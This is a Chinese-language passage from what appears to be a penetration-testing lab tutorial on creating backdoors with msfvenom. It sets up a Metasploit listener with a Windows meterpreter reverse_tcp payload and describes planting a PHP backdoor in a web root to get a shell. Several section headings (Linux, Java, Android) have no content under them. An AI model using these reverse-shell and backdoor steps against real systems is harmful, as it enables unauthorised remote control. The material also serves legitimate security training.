生成后门文件:
在这里需要用到一个命令:msfvenom
在Kali的终端这种直接输入msfvenom -h就可以查看相关的参数信息。
下面示例的参数的解释直接通过-h参数查看就好,在下面就不再做多的说明了。
Windows后门:
在msf控制台中,分别输入:
search handle
use exploit/multi/handler
show options
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.10.162
set LPORT 1234
最后执行exploit开始监听
将文件保存在Windows server 2k3中并运行,可以在Kali的监听窗口中得到meterpreter:
Linux后门:
Java后门:
Android后门:
PHP后门:
将生成php后门文件上传到Windows server 2k3的Web根目录中,在Kali中跟上面的示例一样来监听端口,然后在第三台主机XP上对其进行访问,因为php文件是在服务器端执行的,可直接获得该Web服务器的shell: